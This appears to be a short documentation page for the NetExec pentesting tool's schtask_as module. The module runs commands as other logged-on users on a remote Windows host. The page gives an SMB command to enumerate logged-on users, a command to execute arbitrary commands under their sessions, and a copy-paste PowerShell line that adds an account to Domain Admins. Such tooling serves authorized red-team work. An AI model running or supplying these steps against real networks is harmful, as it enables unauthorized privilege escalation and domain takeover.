🆕Impersonate logged-on Users

Use Sessions from logged-on Users to execute arbitrary commands using schtask_as

You need at least local admin privilege on the remote target

The Module schtask_as can execute commands on behalf of other users which have sessions on the target, thanks to the contribution from @Defte_.

1. Enumerate logged-on users on your Target

nxc smb <ip> -u <localAdmin> -p <password> --loggedon-users

2. Execute commands on behalf of other users

nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>

Custom command to add a user to the domain admin group for easy copy&pasting:

powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"

Last updated